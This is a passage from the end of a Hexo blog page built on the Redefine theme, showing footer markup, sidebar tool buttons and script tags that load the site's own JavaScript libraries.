                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.2</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>





    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>




    
<script src="/js/build/tools/runtime.js"></script>

    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>











    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>